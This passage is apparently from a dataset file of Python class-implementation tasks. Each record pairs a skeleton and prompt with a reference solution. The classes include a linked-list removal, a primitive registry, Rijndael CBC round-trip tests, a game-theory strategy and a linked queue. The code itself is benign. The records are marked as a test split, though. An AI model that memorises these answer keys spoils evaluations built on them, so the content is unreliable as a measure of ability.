dummy.next\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"Two pass solution\"\"\"\n <|body_0|>\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"One pass solution, maintaining an (n + 1) gap b/w two pointers\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n dummy = ListNode(0)\n dummy.next = head\n curr = head\n position = 0\n while curr:\n position += 1\n curr = curr.next\n position -= n\n curr = dummy\n while position > 0:\n position -= 1\n curr = curr.next\n curr.next = curr.next.next\n return dummy.next\n<|end_body_0|>\n\n<|body_start_1|>\n dummy = ListNode(0)\n dummy.next = head\n first = dummy\n second = dummy\n for i in range(n + 1):\n first = first.next\n while first:\n first = first.next\n second = second.next\n second.next = second.next.next\n return dummy.next\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000125", "length_bytes": 1243, "license_type": "no_license", "methods": [{"docstring": "Two pass solution", "name": "removeNthFromEnd", "signature": "def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode"}, {"docstring": "One pass solution, maintaining an (n + 1) gap b/w two pointers", "name": "removeNthFromEnd", "signature": "def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002255", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode: Two pass solution\n- def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode: One pass solution, maintaining an (n + 1) gap b/w two pointers", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode: Two pass solution\n- def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode: One pass solution, maintaining an (n + 1) gap b/w two pointers\n\n<|skeleton|>\nclass Solution:\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"Two pass solution\"\"\"\n <|body_0|>\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"One pass solution, maintaining an (n + 1) gap b/w two pointers\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n dummy = ListNode(0)\n dummy.next = head\n curr = head\n position = 0\n while curr:\n position += 1\n curr = curr.next\n position -= n\n curr = dummy\n while position > 0:\n position -= 1\n curr = curr.next\n curr.next = curr.next.next\n return dummy.next\n<|end_body_0|>\n\n<|body_start_1|>\n dummy = ListNode(0)\n dummy.next = head\n first = dummy\n second = dummy\n for i in range(n + 1):\n first = first.next\n while first:\n first = first.next\n second = second.next\n second.next = second.next.next\n return dummy.next\n<|end_body_1|>\n", "revision_id": "f33d004d7629d46fbc5670f5b384f8a604d7f1e7", "skeleton": "<|skeleton|>\nclass Solution:\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"Two pass solution\"\"\"\n <|body_0|>\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"One pass solution, maintaining an (n + 1) gap b/w two pointers\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"Two pass solution\"\"\"\n dummy = ListNode(0)\n dummy.next = head\n curr = head\n position = 0\n while curr:\n position += 1\n curr = curr.next\n position -= n\n curr = dummy\n while position > 0:\n position -= 1\n curr = curr.next\n curr.next = curr.next.next\n return dummy.next\n\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n \"\"\"One pass solution, maintaining an (n + 1) gap b/w two pointers\"\"\"\n dummy = ListNode(0)\n dummy.next = head\n first = dummy\n second = dummy\n for i in range(n + 1):\n first = first.next\n while first:\n first = first.next\n second = second.next\n second.next = second.next.next\n return dummy.next\n", "source": "the_stack_v2_python_sparse", "source_path": "Remove Nth Node From End of List.py", "source_repo": "aulee888/LeetCode", "split": "test", "star_events_count": 0} {"blob_id": "f64bcd3dbd53b90534bb61bf076b87d7a2ff7e93", "bodies": ["def deco(fn):\n \"\"\"Decorate the function.\"\"\"\n if isinstance(prim, str):\n self[prim] = fn\n elif issubclass(prim, Primitive):\n self[id(prim)] = fn\n return fn\nreturn deco", "fn = default\nif isinstance(prim_obj, str) and prim_obj in self:\n fn = self[prim_obj]\nelif isinstance(prim_obj, Primitive):\n key = id(prim_obj.__class__)\n if key in self:\n fn = self[key]\n else:\n key = prim_obj.name\n if key in self:\n fn = self[prim_obj.name]\nreturn fn"], "bodies_text": "<|body_start_0|>\n def deco(fn):\n \"\"\"Decorate the function.\"\"\"\n if isinstance(prim, str):\n self[prim] = fn\n elif issubclass(prim, Primitive):\n self[id(prim)] = fn\n return fn\n return deco\n<|end_body_0|>\n\n<|body_start_1|>\n fn = default\n if isinstance(prim_obj, str) and prim_obj in self:\n fn = self[prim_obj]\n elif isinstance(prim_obj, Primitive):\n key = id(prim_obj.__class__)\n if key in self:\n fn = self[key]\n else:\n key = prim_obj.name\n if key in self:\n fn = self[prim_obj.name]\n return fn\n<|end_body_1|>\n", "class_docstring": "Registry class for registry functions for grad and vm_impl on Primitive.", "class_name": "Registry", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-proprietary-license", "MPL-1.0", "OpenSSL", "LGPL-3.0-only", "LicenseRef-scancode-warranty-disclaimer", "BSD-3-Clause-Open-MPI", "MIT", "MPL-2.0-no-copyleft-exception", "NTP", "BSD-3-Clause", "GPL-1.0-or-later", "0BSD", "MPL-2.0", "LicenseRef-scancode-free-unknown", "AGPL-3.0-only", "Libpng", "MPL-1.1", "IJG", "GPL-2.0-only", "BSL-1.0", "Zlib", "LicenseRef-scancode-public-domain", "LicenseRef-scancode-python-cwi", "BSD-2-Clause", "LicenseRef-scancode-gary-s-brown", "LGPL-2.1-only", "LicenseRef-scancode-other-permissive", "Python-2.0", "LicenseRef-scancode-mit-nagy", "LicenseRef-scancode-other-copyleft", "LicenseRef-scancode-unknown-license-reference", "Unlicense"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Registry:\n \"\"\"Registry class for registry functions for grad and vm_impl on Primitive.\"\"\"\n\n def register(self, prim):\n \"\"\"register the function.\"\"\"\n <|body_0|>\n\n def get(self, prim_obj, default):\n \"\"\"Get the value by primitive.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def deco(fn):\n \"\"\"Decorate the function.\"\"\"\n if isinstance(prim, str):\n self[prim] = fn\n elif issubclass(prim, Primitive):\n self[id(prim)] = fn\n return fn\n return deco\n<|end_body_0|>\n\n<|body_start_1|>\n fn = default\n if isinstance(prim_obj, str) and prim_obj in self:\n fn = self[prim_obj]\n elif isinstance(prim_obj, Primitive):\n key = id(prim_obj.__class__)\n if key in self:\n fn = self[key]\n else:\n key = prim_obj.name\n if key in self:\n fn = self[prim_obj.name]\n return fn\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000126", "length_bytes": 2358, "license_type": "permissive", "methods": [{"docstring": "register the function.", "name": "register", "signature": "def register(self, prim)"}, {"docstring": "Get the value by primitive.", "name": "get", "signature": "def get(self, prim_obj, default)"}], "n_methods": 2, "prompt": "Implement the Python class `Registry` described below.\n\nClass description:\nRegistry class for registry functions for grad and vm_impl on Primitive.\n\nMethod signatures and docstrings:\n- def register(self, prim): register the function.\n- def get(self, prim_obj, default): Get the value by primitive.", "prompted_full_text": "Implement the Python class `Registry` described below.\n\nClass description:\nRegistry class for registry functions for grad and vm_impl on Primitive.\n\nMethod signatures and docstrings:\n- def register(self, prim): register the function.\n- def get(self, prim_obj, default): Get the value by primitive.\n\n<|skeleton|>\nclass Registry:\n \"\"\"Registry class for registry functions for grad and vm_impl on Primitive.\"\"\"\n\n def register(self, prim):\n \"\"\"register the function.\"\"\"\n <|body_0|>\n\n def get(self, prim_obj, default):\n \"\"\"Get the value by primitive.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def deco(fn):\n \"\"\"Decorate the function.\"\"\"\n if isinstance(prim, str):\n self[prim] = fn\n elif issubclass(prim, Primitive):\n self[id(prim)] = fn\n return fn\n return deco\n<|end_body_0|>\n\n<|body_start_1|>\n fn = default\n if isinstance(prim_obj, str) and prim_obj in self:\n fn = self[prim_obj]\n elif isinstance(prim_obj, Primitive):\n key = id(prim_obj.__class__)\n if key in self:\n fn = self[key]\n else:\n key = prim_obj.name\n if key in self:\n fn = self[prim_obj.name]\n return fn\n<|end_body_1|>\n", "revision_id": "54acb15d435533c815ee1bd9f6dc0b56b4d4cf83", "skeleton": "<|skeleton|>\nclass Registry:\n \"\"\"Registry class for registry functions for grad and vm_impl on Primitive.\"\"\"\n\n def register(self, prim):\n \"\"\"register the function.\"\"\"\n <|body_0|>\n\n def get(self, prim_obj, default):\n \"\"\"Get the value by primitive.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Registry:\n \"\"\"Registry class for registry functions for grad and vm_impl on Primitive.\"\"\"\n\n def register(self, prim):\n \"\"\"register the function.\"\"\"\n def deco(fn):\n \"\"\"Decorate the function.\"\"\"\n if isinstance(prim, str):\n self[prim] = fn\n elif issubclass(prim, Primitive):\n self[id(prim)] = fn\n return fn\n return deco\n\n def get(self, prim_obj, default):\n \"\"\"Get the value by primitive.\"\"\"\n fn = default\n if isinstance(prim_obj, str) and prim_obj in self:\n fn = self[prim_obj]\n elif isinstance(prim_obj, Primitive):\n key = id(prim_obj.__class__)\n if key in self:\n fn = self[key]\n else:\n key = prim_obj.name\n if key in self:\n fn = self[prim_obj.name]\n return fn\n", "source": "the_stack_v2_python_sparse", "source_path": "mindspore/python/mindspore/ops/_register_for_op.py", "source_repo": "mindspore-ai/mindspore", "split": "test", "star_events_count": 4178} {"blob_id": "79642d78bdfc4b8895089edb0cd6edcda84ff165", "bodies": ["key = '2b7e151628aed2a6abf7158809cf4f3c'\niv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\npt = '6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e51\\n 30c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710'\nkey, iv, pt = (a2b_p(key), a2b_p(iv), a2b_p(pt))\nalg = CBC(Rijndael(key, blockSize=32))\nct = alg.encrypt(pt, iv=iv)\nself.assertEqual(alg.decrypt(iv + ct), pt)", "key = '2b7e151628aed2a6abf7158809cf4f3c'\niv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\nkey, iv = (a2b_p(key), a2b_p(iv))\nalg = CBC(Rijndael(key, blockSize=32))\nfor i in range(100):\n pt = i * 'a'\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)"], "bodies_text": "<|body_start_0|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n pt = '6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e51\\n 30c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710'\n key, iv, pt = (a2b_p(key), a2b_p(iv), a2b_p(pt))\n alg = CBC(Rijndael(key, blockSize=32))\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_0|>\n\n<|body_start_1|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n key, iv = (a2b_p(key), a2b_p(iv))\n alg = CBC(Rijndael(key, blockSize=32))\n for i in range(100):\n pt = i * 'a'\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_1|>\n", "class_docstring": "CBC test with Rijndael", "class_name": "CBC_Rijndael_Test", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CBC_Rijndael_Test:\n \"\"\"CBC test with Rijndael\"\"\"\n\n def testCBC_Rijndael_256(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_0|>\n\n def testCBC_Rijndael_variable_data(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n pt = '6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e51\\n 30c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710'\n key, iv, pt = (a2b_p(key), a2b_p(iv), a2b_p(pt))\n alg = CBC(Rijndael(key, blockSize=32))\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_0|>\n\n<|body_start_1|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n key, iv = (a2b_p(key), a2b_p(iv))\n alg = CBC(Rijndael(key, blockSize=32))\n for i in range(100):\n pt = i * 'a'\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000127", "length_bytes": 5430, "license_type": "permissive", "methods": [{"docstring": "Rijndael CBC 256", "name": "testCBC_Rijndael_256", "signature": "def testCBC_Rijndael_256(self)"}, {"docstring": "Rijndael CBC 256", "name": "testCBC_Rijndael_variable_data", "signature": "def testCBC_Rijndael_variable_data(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001259", "prompt": "Implement the Python class `CBC_Rijndael_Test` described below.\n\nClass description:\nCBC test with Rijndael\n\nMethod signatures and docstrings:\n- def testCBC_Rijndael_256(self): Rijndael CBC 256\n- def testCBC_Rijndael_variable_data(self): Rijndael CBC 256", "prompted_full_text": "Implement the Python class `CBC_Rijndael_Test` described below.\n\nClass description:\nCBC test with Rijndael\n\nMethod signatures and docstrings:\n- def testCBC_Rijndael_256(self): Rijndael CBC 256\n- def testCBC_Rijndael_variable_data(self): Rijndael CBC 256\n\n<|skeleton|>\nclass CBC_Rijndael_Test:\n \"\"\"CBC test with Rijndael\"\"\"\n\n def testCBC_Rijndael_256(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_0|>\n\n def testCBC_Rijndael_variable_data(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n pt = '6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e51\\n 30c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710'\n key, iv, pt = (a2b_p(key), a2b_p(iv), a2b_p(pt))\n alg = CBC(Rijndael(key, blockSize=32))\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_0|>\n\n<|body_start_1|>\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n key, iv = (a2b_p(key), a2b_p(iv))\n alg = CBC(Rijndael(key, blockSize=32))\n for i in range(100):\n pt = i * 'a'\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n<|end_body_1|>\n", "revision_id": "ed4d80d1e6f09634c12c0c3096e39667c6642b95", "skeleton": "<|skeleton|>\nclass CBC_Rijndael_Test:\n \"\"\"CBC test with Rijndael\"\"\"\n\n def testCBC_Rijndael_256(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_0|>\n\n def testCBC_Rijndael_variable_data(self):\n \"\"\"Rijndael CBC 256\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CBC_Rijndael_Test:\n \"\"\"CBC test with Rijndael\"\"\"\n\n def testCBC_Rijndael_256(self):\n \"\"\"Rijndael CBC 256\"\"\"\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n pt = '6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e51\\n 30c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710'\n key, iv, pt = (a2b_p(key), a2b_p(iv), a2b_p(pt))\n alg = CBC(Rijndael(key, blockSize=32))\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n\n def testCBC_Rijndael_variable_data(self):\n \"\"\"Rijndael CBC 256\"\"\"\n key = '2b7e151628aed2a6abf7158809cf4f3c'\n iv = '000102030405060708090a0b0c0d0e0f000102030405060708090a0b0c0d0e0f'\n key, iv = (a2b_p(key), a2b_p(iv))\n alg = CBC(Rijndael(key, blockSize=32))\n for i in range(100):\n pt = i * 'a'\n ct = alg.encrypt(pt, iv=iv)\n self.assertEqual(alg.decrypt(iv + ct), pt)\n", "source": "the_stack_v2_python_sparse", "source_path": "script.module.cryptolib/lib/cryptopy/cipher/cbc_test.py", "source_repo": "gacj22/WizardGacj22", "split": "test", "star_events_count": 4} {"blob_id": "8fb919f2a151a8a579f812aecd079f6dab826d28", "bodies": ["super(Punisher, self).__init__()\nself.mem_length = 1\nself.grudged = False\nself.grudge_memory = 1", "if self.grudge_memory >= self.mem_length:\n self.grudge_memory = 0\n self.grudged = False\nif self.grudged:\n self.grudge_memory += 1\n return 'D'\nelif 'D' in opponent.history[-1:]:\n self.mem_length = opponent.defections * 20 // len(opponent.history)\n self.grudged = True\n return 'D'\nreturn 'C'", "Player.reset(self)\nself.grudged = False\nself.grudge_memory = 0\nself.mem_length = 1"], "bodies_text": "<|body_start_0|>\n super(Punisher, self).__init__()\n self.mem_length = 1\n self.grudged = False\n self.grudge_memory = 1\n<|end_body_0|>\n\n<|body_start_1|>\n if self.grudge_memory >= self.mem_length:\n self.grudge_memory = 0\n self.grudged = False\n if self.grudged:\n self.grudge_memory += 1\n return 'D'\n elif 'D' in opponent.history[-1:]:\n self.mem_length = opponent.defections * 20 // len(opponent.history)\n self.grudged = True\n return 'D'\n return 'C'\n<|end_body_1|>\n\n<|body_start_2|>\n Player.reset(self)\n self.grudged = False\n self.grudge_memory = 0\n self.mem_length = 1\n<|end_body_2|>\n", "class_docstring": "A player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.", "class_name": "Punisher", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Punisher:\n \"\"\"A player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\"\"\"\n\n def __init__(self):\n \"\"\"Initialised the player\"\"\"\n <|body_0|>\n\n def strategy(self, opponent):\n \"\"\"Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\"\"\"\n <|body_1|>\n\n def reset(self):\n \"\"\"Resets scores and history\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Punisher, self).__init__()\n self.mem_length = 1\n self.grudged = False\n self.grudge_memory = 1\n<|end_body_0|>\n\n<|body_start_1|>\n if self.grudge_memory >= self.mem_length:\n self.grudge_memory = 0\n self.grudged = False\n if self.grudged:\n self.grudge_memory += 1\n return 'D'\n elif 'D' in opponent.history[-1:]:\n self.mem_length = opponent.defections * 20 // len(opponent.history)\n self.grudged = True\n return 'D'\n return 'C'\n<|end_body_1|>\n\n<|body_start_2|>\n Player.reset(self)\n self.grudged = False\n self.grudge_memory = 0\n self.mem_length = 1\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000128", "length_bytes": 3311, "license_type": "permissive", "methods": [{"docstring": "Initialised the player", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D", "name": "strategy", "signature": "def strategy(self, opponent)"}, {"docstring": "Resets scores and history", "name": "reset", "signature": "def reset(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007273", "prompt": "Implement the Python class `Punisher` described below.\n\nClass description:\nA player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\n\nMethod signatures and docstrings:\n- def __init__(self): Initialised the player\n- def strategy(self, opponent): Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\n- def reset(self): Resets scores and history", "prompted_full_text": "Implement the Python class `Punisher` described below.\n\nClass description:\nA player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\n\nMethod signatures and docstrings:\n- def __init__(self): Initialised the player\n- def strategy(self, opponent): Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\n- def reset(self): Resets scores and history\n\n<|skeleton|>\nclass Punisher:\n \"\"\"A player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\"\"\"\n\n def __init__(self):\n \"\"\"Initialised the player\"\"\"\n <|body_0|>\n\n def strategy(self, opponent):\n \"\"\"Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\"\"\"\n <|body_1|>\n\n def reset(self):\n \"\"\"Resets scores and history\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Punisher, self).__init__()\n self.mem_length = 1\n self.grudged = False\n self.grudge_memory = 1\n<|end_body_0|>\n\n<|body_start_1|>\n if self.grudge_memory >= self.mem_length:\n self.grudge_memory = 0\n self.grudged = False\n if self.grudged:\n self.grudge_memory += 1\n return 'D'\n elif 'D' in opponent.history[-1:]:\n self.mem_length = opponent.defections * 20 // len(opponent.history)\n self.grudged = True\n return 'D'\n return 'C'\n<|end_body_1|>\n\n<|body_start_2|>\n Player.reset(self)\n self.grudged = False\n self.grudge_memory = 0\n self.mem_length = 1\n<|end_body_2|>\n", "revision_id": "0ce3aa29eb239b9a9055cd7bebb627602851b65a", "skeleton": "<|skeleton|>\nclass Punisher:\n \"\"\"A player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\"\"\"\n\n def __init__(self):\n \"\"\"Initialised the player\"\"\"\n <|body_0|>\n\n def strategy(self, opponent):\n \"\"\"Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\"\"\"\n <|body_1|>\n\n def reset(self):\n \"\"\"Resets scores and history\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Punisher:\n \"\"\"A player starts by cooperating however will defect if at any point the opponent has defected, but forgets after meme_length matches, with 1<=mem_length<=20 proportional to the amount of time the opponent has played 'D', punishing that player for playing 'D' too often.\"\"\"\n\n def __init__(self):\n \"\"\"Initialised the player\"\"\"\n super(Punisher, self).__init__()\n self.mem_length = 1\n self.grudged = False\n self.grudge_memory = 1\n\n def strategy(self, opponent):\n \"\"\"Begins by playing C, then plays D for an amount of rounds proportional to the opponents historical '%' of playing 'D' if the opponent ever plays D\"\"\"\n if self.grudge_memory >= self.mem_length:\n self.grudge_memory = 0\n self.grudged = False\n if self.grudged:\n self.grudge_memory += 1\n return 'D'\n elif 'D' in opponent.history[-1:]:\n self.mem_length = opponent.defections * 20 // len(opponent.history)\n self.grudged = True\n return 'D'\n return 'C'\n\n def reset(self):\n \"\"\"Resets scores and history\"\"\"\n Player.reset(self)\n self.grudged = False\n self.grudge_memory = 0\n self.mem_length = 1\n", "source": "the_stack_v2_python_sparse", "source_path": "axelrod/strategies/punisher.py", "source_repo": "jamesbroadhead/Axelrod", "split": "test", "star_events_count": 1} {"blob_id": "3938f6d9f1d809225cd2a9e0722e6a46f20fea77", "bodies": ["if self.is_empty():\n raise Empty('Queue is empty')\nreturn self._head._element", "if self.is_empty():\n raise Empty('Queue is empty')\nanswer = self._head._element\nself._head = self._head._next\nself._size -= 1\nif self.is_empty():\n self._tail = None\nreturn answer", "newest = self._Node(element, None)\nif self.is_empty():\n self._head = newest\nelse:\n self._tail._next = newest\nself._tail = newest\nself._size += 1", "if not self.is_empty():\n head = self._head\n self._head = head._next\n head._next = None\n self._tail._next = head\n self._tail = head", "assert isinstance(Q, LinkedQueue)\nif self.is_empty():\n self._head = Q._head\nelse:\n self._tail._next = Q._head\nQ._head = None"], "bodies_text": "<|body_start_0|>\n if self.is_empty():\n raise Empty('Queue is empty')\n return self._head._element\n<|end_body_0|>\n\n<|body_start_1|>\n if self.is_empty():\n raise Empty('Queue is empty')\n answer = self._head._element\n self._head = self._head._next\n self._size -= 1\n if self.is_empty():\n self._tail = None\n return answer\n<|end_body_1|>\n\n<|body_start_2|>\n newest = self._Node(element, None)\n if self.is_empty():\n self._head = newest\n else:\n self._tail._next = newest\n self._tail = newest\n self._size += 1\n<|end_body_2|>\n\n<|body_start_3|>\n if not self.is_empty():\n head = self._head\n self._head = head._next\n head._next = None\n self._tail._next = head\n self._tail = head\n<|end_body_3|>\n\n<|body_start_4|>\n assert isinstance(Q, LinkedQueue)\n if self.is_empty():\n self._head = Q._head\n else:\n self._tail._next = Q._head\n Q._head = None\n<|end_body_4|>\n", "class_docstring": "FIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front", "class_name": "LinkedQueue", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LinkedQueue:\n \"\"\"FIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\"\"\"\n\n def first(self):\n \"\"\"return __but do not remove__ the element at the front of the queue :return:\"\"\"\n <|body_0|>\n\n def dequeue(self):\n \"\"\"remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:\"\"\"\n <|body_1|>\n\n def enqueue(self, element):\n \"\"\"add an element to the back of queue :param element: :return:\"\"\"\n <|body_2|>\n\n def rotate(self):\n \"\"\"rotate front element to the back of the queue :return:\"\"\"\n <|body_3|>\n\n def concatenate(self, Q):\n \"\"\"takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. run in O(1) result in Q being an empty queue :param Q: :return:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.is_empty():\n raise Empty('Queue is empty')\n return self._head._element\n<|end_body_0|>\n\n<|body_start_1|>\n if self.is_empty():\n raise Empty('Queue is empty')\n answer = self._head._element\n self._head = self._head._next\n self._size -= 1\n if self.is_empty():\n self._tail = None\n return answer\n<|end_body_1|>\n\n<|body_start_2|>\n newest = self._Node(element, None)\n if self.is_empty():\n self._head = newest\n else:\n self._tail._next = newest\n self._tail = newest\n self._size += 1\n<|end_body_2|>\n\n<|body_start_3|>\n if not self.is_empty():\n head = self._head\n self._head = head._next\n head._next = None\n self._tail._next = head\n self._tail = head\n<|end_body_3|>\n\n<|body_start_4|>\n assert isinstance(Q, LinkedQueue)\n if self.is_empty():\n self._head = Q._head\n else:\n self._tail._next = Q._head\n Q._head = None\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000129", "length_bytes": 4149, "license_type": "no_license", "methods": [{"docstring": "return __but do not remove__ the element at the front of the queue :return:", "name": "first", "signature": "def first(self)"}, {"docstring": "remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:", "name": "dequeue", "signature": "def dequeue(self)"}, {"docstring": "add an element to the back of queue :param element: :return:", "name": "enqueue", "signature": "def enqueue(self, element)"}, {"docstring": "rotate front element to the back of the queue :return:", "name": "rotate", "signature": "def rotate(self)"}, {"docstring": "takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. run in O(1) result in Q being an empty queue :param Q: :return:", "name": "concatenate", "signature": "def concatenate(self, Q)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_006095", "prompt": "Implement the Python class `LinkedQueue` described below.\n\nClass description:\nFIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\n\nMethod signatures and docstrings:\n- def first(self): return __but do not remove__ the element at the front of the queue :return:\n- def dequeue(self): remove and return the first element of the queue FIFO (first in first out) raise 